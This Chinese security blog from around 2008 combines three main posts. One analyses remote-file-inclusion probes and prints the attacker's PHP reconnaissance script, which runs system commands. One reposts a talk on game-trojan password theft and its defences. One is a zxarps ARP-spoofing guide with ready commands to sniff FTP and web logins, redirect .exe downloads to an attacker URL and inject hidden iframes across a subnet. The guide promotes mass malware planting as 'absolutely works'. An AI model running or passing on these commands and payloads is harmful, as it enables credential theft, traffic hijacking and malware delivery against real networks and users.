Lin's Space|Only

日志里发现的可疑记录：

66.98.140.99 – - [06/Jun/2008:08:52:32 +0800] “GET /map/sitemap.xml/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 3483 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:32 +0800] “GET /playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 302 592 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:36 +0800] “GET /playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 11767 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:38 +0800] “GET /map/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 302 596 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:38 +0800] “GET /map/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 11771 “-” “libwww-perl/5.65″

去看啦眼那个id.txt文件，是个php的，可能以为这个blog有文件包含漏洞就来试探试探（难道我有符合哪些批量挖掘漏洞的“关键字”页面）？
那个id.txt如果成功执行的话可以探测出：
web服务器系统的名称 版本号 机子名
操作系统类别，比如winnt，linux
系统运行时间
..
程序（本blog）安装目录
Php版本号
web服务器程序版本号getenv(“SERVER_SOFTWARE”);
server-name（服务器名称） $_SERVER['SERVER_NAME'];
服务器ip
空闲空间
已经使用的空间
一共的空间

更详细的还是看看他的这个php代码吧

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

今日一点 php, 嗅探

相对pc的了解，对手机的了解还比较“少”的黑客来说，使用手机授权确实提高啦一层安全性，只是手机的安全性如果pc的安全貌似比pc更弱。手机如果明文发送嗅探也不是没办法！

Windows底层和反木马方面专家张翼指出，随着信息的公开，木马的生成越加容易，越加泛滥，尽管企业做出最大努力还是很难保证系统不被攻克。如果企业可以跳出在不安全的PC上的局限，通过手机作为可信物，相关操作比如登录以及密码修改需要短信回复确认，或将可以解决木马泛滥的问题。

以下是文字实录：

张翼：大家好！首先讲讲网游木马常用攻击技术。第二，讲讲从开发商的角度，以较低的成本实现防御网游木马的策略。首先是键盘记录，所谓的键盘记录是在在键盘输入的时候木马会把你的键盘输入的信息记录下来，网上流传最广、最通俗的方法就是安装全局消息钩子，从而窃取密码。原来消息钩子这种进入密码的方法用得比较多，但是从2006年起主动防御的流行这类方法会被行为监控拦截，比如卡巴斯基这种主动防御就防这个。后来逐步地有一些黑客发掘出以前使用的比较少的被厂商所忽视的一种方法，例如图片上举到的这些（图）。

前面几个安装全局消息钩子、GetKeyState、GetAsyncKeyState 、 DirtecX接口的方法是从用户态实现的。原始输出设备raw input用它来窃取密码，这也是属于用户态的。键盘过滤驱动以及挂钩键盘驱动的Dispatch例程等方法属于核心态实现的。 Ppt中后面提到的所谓的Inline Hook是广义的，就是我进行挂接的时候可以在Rin3上挂，也可以在Rin0下挂，我的hook可以挂在自己的游戏程序里面，从而获取密码，深入的话也可以深到话kbclass设备的回调函数。突破nPtotect保护也不难。

第二部分是内存读取。用户输入密码后，通常情况下密码没有经过处理的话，有一段时间用户输入的密码会以明文的形式存放在内存中，包括登录游戏后，游戏中人物装备等级等信息都可以从游戏进程的内存中读取。

第三是星号密码获取以及缓存密码，比如在QQ或 MSN上输入密码的时候，可以选择记录密码的情况。使用GetWindowText函数就可以获取常规的星号密码，当然对于具有密码属性的输入框在GetWindowText之前需要使用 SendMessage取消其密码属性。

下面讲到浏览器插件，主要用于获取IE相关的信息，也可以用来突破HTPS。

来看张图片，小区域精确截图（图），这种方法可以应对许多种网游的保护措施，先安装一个全局鼠标钩子，对你鼠标点击的时候，比如鼠标点击这边，事先算一下你的按纽的像素，把边长除以二，以鼠标点击的点为正方形的中心，从而以这个点截取一个正方形，面积最大的就是我们所要的密码信息。小区域精确截图的方法和图象识别，从而可以把图象信息直接转化为字符。如果说比较复杂，图象识别不了的话，黑客们常使用的方法就是发邮件，因为发邮件是可以以HTML的方式，从而可以把图片嵌在里面，黑客收到信的时候，看密码就一目了然。虽然是截取的图，但是也能很清楚地看到。

除了刚才讲的这些，下面还有应用得比较广的，例如封包截取或者协议分析，从协议的角度分析人物信息、用户名、密码。现在还是有一些比较厉害的人可以通过调试，逆向工程，结合ARP欺骗，对于非对称密钥加密的话，传统的破解方法比较困难。但是在局域网里面可以结合ARP欺骗、伪造，实现相应的效果。基本上现在的木马在对付非对称密钥加密的时候基本上是采用欺骗的方法。

还有一些其他技术，比如一些猥琐方法，谈技术含量比较低，但还是有效果。举一个例子，很久之前人家想到QQ密码，他自己写一个界面和QQ基本上差不多的，然后输入之后，再把真正的QQ进程运营起来。这是被人鄙视的方法，要钻空子的话还是比较多的。几年前盛大对安全很重视，那时候推出的盛大密宝，但它那种对于真正想窃取的人也是形同虚设，但是那个可能比较困难，或者还需要入侵它的服务器，把相应的算法搞清楚。这是比较困难的，但是用得比较多的，现在很容易实现的就比如这张图（图），我们后面讲的解决方案也会碰到类似的问题，对于盛大密宝使用的这些方法，我先简单地把盛大密宝的使用过程讲一下。

在输入用户名、密码后，它会又出现一个对话框，盛大密宝是以1分钟为间隔。以一分钟为单位，有一个函数，那个函数有两个变量，盛大密宝的序列号做了变量，还有一个变量就是和时间相关的。以一分钟为单位，会随机生成六位数，但是登录之后游戏里面就会随机抽取三位，请你输入盛大密宝，所谓盛大密宝就像U盘大小，中间有一个写字屏，以一分钟为单位，按照它的算法随机生成六位数，游戏的程序比如说请输入第一位、第三位、第四位，从六位数里面选三位数，让你输入第几，这是游戏随机的。以我们常人的角度看来就很安全，安全性很高。但是还是能被破解，原理就是这样（图）。

比如这里有两台机器，这台机器上面已经感染了能够破解密宝的高级木马，攻击者已获取初次登录及的用户名、密码。攻击者用已获得受害者的用户名密码登录。当受害者登录游戏时输入的用户名和密码已被木马程序换掉，登录另外一个无关帐户。为什么木马要在受害者登录时把他的帐号密码换成其他帐号呢，因为一个帐号不能同时登录。这样受害者输入自己的用户名、密码的时候其实已经变成另外一个人的帐号了。他进去之后会出现一个框，要求输入盛大密宝随机生成的6位数中的3位数。而且3位数的序号是给定的，比如第一位、第三位、第四位的六位数。从六位里面选三位位置是随机的。攻击者登录后出现密宝信息输入框，比如说请输入六位数里面的第四位、五位、六位。如图，攻击者只需在木马控制端里输入四、五、六，点完发送。此时木马端收到信息后就会把受害者的第一位、第三位、第四位提示信息换成四、五、六位。这样受害者就会输入盛大密宝随机生成的6位数第4、5、6位数字，这正是攻击者登录游戏所需要的信息。所以攻击者就实现了破解盛大密宝保护的效果。

因为黑客进入游戏之后防止他再重新进入，发现帐号正在使用，可以在我们的木马端做一些手脚，拦截封包两三分钟内让他上不了网，等他看看是否有一些有价值的装备或者游戏币，等处理完之后再让他上线。或者暴力一点，就是直接终止进程。也可以挂钩NtCreateProcess/Ex、NtCreateSetion，在一定时间内禁止次进程创建。

从内存读取的方法在木马里面也是使用得非常广泛的。在QQ稍微老一点的版本也是同样存在内存里面。现在有一些网上银行及游戏，他可能采用软键盘，我刚才说的对付软件盘通常有两种，一种是截图的方法，还有就是挂钩TextOut函数，取得软件中的字符，类似于金山词霸的技术，也就是是屏幕取词，用户点击点密码时已经被屏幕取词获得密码的字符信息。我这里讲的是一些主流的，还有针对特定的情况有一些比较猥琐的方法。

刚才是从攻击的角度进行分析的。现在开始讲怎样防御。考虑防御站的角度不同，比如游戏开发商是从自己写游戏的角度。从第三方安全软件开发商，比如瑞星、卡巴斯基，或者从使用者、网络管理员，比如网络管理员怎么样从边界防火墙角度怎样进行相应的配置。现在我讲的主要侧重于游戏开发者的角度。从游戏开发商的角度和第三方安装软件的防御角度还是有区别的。因为如果是游戏开发商的话，他做防御是要小型化，主要针对我自身的特性。不像安全软件可以做的很全面很庞大。从游戏开发商的角度是怎样做最少的事情取得自身游戏的安全性。

我们先从基于主机的角度谈一谈。我们刚才已经粗略地了解了网游木马的密码获取常用手段，对应地我们要将缓存密码加密，自定义窗口类对相应读取密码内容的窗口消息进行处理，从而使它用传统的方法获取不到密码。第二是防范按键记录，虽然这只是简简单单几个字，我是把涉及到的面讲一讲，同样是一个防范按键进入，可以做得很浅，但同样也可以做得很深。越深入底层公开的资料越少，操作的系统提供的现成接口比较少，需要自己做的比较多，所以难度系数增大，从而会写的人就比较少，安全性就提高了。但是随着防御越往底层做，虽然安全性提高了，但是稳定性也下降了。从理论上说，只要原理正确的，也是可以做到稳定的。但是因为这些东西是人开发的，由于水平、经验，尤其是开发时间的限制，没有那么多时间去测试，没有时间经过多种客户环境的考验，所以想推出一个非常底层的产品级的、比较稳定的，时间会比较漫长。现在防范键盘记录的一个比较底层的比较稳定的方法是挂kbclass中的KeyboardClassServiceCallback，兼容性也较好，兼容USB、 PS/2的。

原来QQ采用的是虚拟键盘，虚拟键盘其实也是一种成本较低效果较好的方法。但需要防御我刚才说那些密码窃取方法，比如挂钩TextOut的屏幕取词以及小区域精确截图。另外就是软键盘中按键的顺序要随机生成，还有就是软键盘在屏幕上出现的位置最好也要随机，如果大键盘位置固定的话还是很容易被盗取。还有就是最好不用字符，用比较复杂具有较强干扰性的图片，这样图象解析就比较困难，一般只能用截屏。我们现在已经知道的屏幕截取的方法通常是CreateDC和模拟鼠标按键PrintScreen键，所以只要挂钩相关函数就可以防止截取。从产品可用性的角度，在输入密码的一分钟之内对截屏功能禁用，这样对可用性也没有什么影响，而且避免了因交互式保护的烦琐带来的用户体验下降的弊端。

还有一种是在网吧里比较盛行的基于ARP欺骗窃取整个局域网内的游戏帐号信息。现在网吧基本上都是交换机的，基本上都是通过ARP欺骗的方法，就可以破取局域网里面其它机器的分包，如果能把网游的协议逆向分析出的话，就可以破解获取整个局域网里所有使用游戏用户的信息。对于网吧和局域网用户，防范ARP欺骗是很有必要的。

网游木马使用的各种密码窃取技术都会使用到相关的函数，从基于主机主动防御的角度，对相关函数挂钩实施行为监控即可防御相应密码防御技术，如 NtOpenProcess、NtReadVirtualMemory、NtUserSetWindowsHookEx、CreateDC等。其中挂钩NtOpenProcess/NtReadVirtualMemory用来防范木马程序读取游戏程序进程空间中的密码，NtUserSetWindowsHookEx用来防范安装全局钩子。另外还可以枚举设备栈，对键盘过滤驱动进行检查。通常安全软件中使用较多的是编写驱动程序挂钩SSDT，还有少部分inline hook。去年出现的比较多的安全软件的驱动漏洞不少是因为SSDT挂钩后的处理函数编写不完善，所以实现行为监控功能时我们自己的处理函数也要写得很健壮，防止漏洞的产生。

对于防御ARP欺骗，通常采取NDIS HOOK或者NDIS IMD技术，截取ARP包进行分析，丢弃伪造的欺骗包。另外实现还应建立一个可信的IP-MAC库，所谓的可信基就是在确保网络没有欺骗的情况下，确保其他机器尤其是网关的IP-MAC映射关系，先把它存起来，然后截取到ARP封包时与事先建立的可信IP-MAC关系进行比较判断。还有一个是比较简单的，就是用系统自带arp命令实现IP/MAC绑定的，但是对于Windows2000应该是没有用的，这点网上几乎没有披露，印象中只有flashsky以前提及过。因为Windows2000没有检查IP-MAC绑定是静态的还是动态的，虽然进行了绑定，但只要有ARP请求/应答包，WIindows系统还是会把伪造的IP-MAC对应关系添加到自身的ARP缓存表中。ARP的绑定功能在Windows2000里面形同虚设。所以通用有效的还是使用驱动利用NDIS HOOK/NDIS IMD技术拦截ARP包分析过滤。

有些情况下要获取游戏密码以及人物信息的话，最好到它的进程空间里面去，所以有很多木马就把自己的dll先注入到你的游戏进程里面。但是现在许多安全软件比如卡巴7、江民2008都采用的主动防御技术，而已防范常规的诸如CreateRemoteThread、SetThreadContext等注入技术。为了绕过主动防御以及实现自启动，某些木马利用了Windows一个简单的系统机制，就是目录的优先级，具体讲如果当没有写绝对路径只是相对路径，调用dll时，优先加载同目录下的，然后才是系统目录。比如在网游目录下释放一个 kernel32.dll，kernel32.dll所有Ring3程序都需要用到的吧，所以只要你的游戏程序隐形起来了，木马释放的 kernel32.dll也就注入到了游戏进程里面。所以防止其他程序在游戏目录中创建相关文件也是比较重要的。关于具体的实现技术可以采用文件过滤驱动，甚至是Ring3下的全局钩子。另外，Ppt中提到的辅助方案：“游戏主进程检查自身模块中除了自身dll模块以及已签名文件有没其他dll模块，有则强行卸载”，与刚才说的互补的，还是比较有效的。

还有就是保护自身程序不被修改，因为当安全软件越来越严格，可能盗号木马无路可走时就以修改你自身的程序实现密码窃取以及自启动，所以对游戏自身

原文地址：http://tech.qq.com/a/20080318/000411.htm

技术分析 Arp, CreateDC, kbclass, NDIS HOOK, NDIS IMD, 嗅探, 手机, 技术峰会, 木马, 游戏, 网络安全, 腾讯

说明：需要winPcap 基于arp欺骗，
具体功能看下面的使用说明

基于ARP欺骗的东东，可网页插马，DNS欺骗，自定义关键字嗅探等

网络地址信息：

0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options（参数说明）:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用’-'指定范围,’,'隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用’-'指定范围,’,'隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字,

‘,’隔开关键字,多个条件’|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用’,'隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名，只关注HTTP/1.1 302

-hackURL [url] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗，只修改UDP的报文,多个可用’,'隔开

格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔，默认是3秒

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

例子代码:

嗅探指定的IP段中端口80的数据，并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter “_USER ,_PASS” -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter “+POST ,+user,+pass” -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter “+POST ,+user,+pass|_USER ,_PASS” -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix “.exe,.rar,.zip” -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert “just for fun

arp欺骗批量挂马
zxarps.exe （ARP欺骗tool）

3389 肉鸡一台最好是服务器 或者内网机器命令： zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’xx’ width=0 height=0>”
这里网马地址就假设为 http://www.baidu.com/
那么命令就是zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
接着上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包然后就执行
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
IP 自己改看看效果 ！！！！！ 绝对好用 自己试就知道了 这样挂马可是同网段好几个服务器的站基本都挂上你的马了只要别人访问这IP段中的某一个服务器上的站那么就自动欺骗插入我们的网马代码

防御办法：若为win系统推荐使用360arp防火墙

通用办法：对客户机和网关做双向ip-mac地址绑定，最好使用交换机替代集线器。

代码调试, 安全 arp欺骗, DNS欺骗, zxarps, 嗅探, 网页插马

先是看到国内的gsm服务商并没有加密数据通讯，又看到手机短信被嗅探窃看的截图（不是我抓得厄）

中国的GSM到底是不是加密的：http://hi.baidu.com/tombkeeper/blog/item/534571d9edcef22811df9bd2.html

手机打电话是可以窃听的?短信也同样？http://hi.baidu.com/tombkeeper/blog/item/49ac4043a14b15159213c636.html

人家移动老总不是说过嘛：“你是谁，你在哪里，我们都知道”。

。。。

安全 Phone sniffer, 嗅探, 手机